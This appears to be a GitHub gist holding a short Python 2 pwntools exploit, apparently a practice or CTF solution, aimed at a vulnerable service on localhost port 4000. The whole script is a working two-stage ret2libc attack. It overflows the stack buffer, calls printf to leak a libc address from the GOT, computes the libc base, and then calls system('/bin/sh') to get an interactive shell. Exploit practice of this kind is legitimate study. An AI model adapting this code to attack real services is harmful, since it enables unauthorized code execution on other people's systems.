@Tosainu
Last active August 15, 2016 12:27
4-D deliverable. Runs on Python 2.

from pwn import *
import struct

def p(x):
    # pack a 32-bit little-endian address
    return struct.pack('<I', x)

# addresses taken from the (non-PIE) target binary
main = 0x804849d
popret = 0x804856f        # pop ; ret gadget, removes printf's argument from the stack
printf_plt = 0x8048360
printf_got = 0x804a010

# symbol offsets inside the target's libc build
printf_offset = 0x004cdd0
system_offset = 0x003fe70
bin_sh_offset = 0x015da8c

s = remote('localhost', 4000)

# stage 1: 44 bytes of padding up to the saved return address, then call
# printf@plt with printf@got as its argument to leak the resolved libc
# address, and return to main for a second pass
payload = ''.join([
    'A' * 44,
    p(printf_plt),
    p(popret),
    p(printf_got),
    p(main),
])
s.send(payload)

print s.recvuntil('!\n')
leak = s.recv(64)
print 'Leaked:', leak

# the first 4 leaked bytes are printf's address in libc; derive the base from it
printf_addr = u32(leak[:4])
libc_base = printf_addr - printf_offset
system_addr = libc_base + system_offset
bin_sh_addr = libc_base + bin_sh_offset
print '[+] libc %x' % libc_base

# stage 2: ret2libc, system("/bin/sh"); 'BBBB' is a dummy return address
payload2 = ''.join([
    'A' * 44,
    p(system_addr),
    'BBBB',
    p(bin_sh_addr),
])
s.send(payload2)
s.interactive()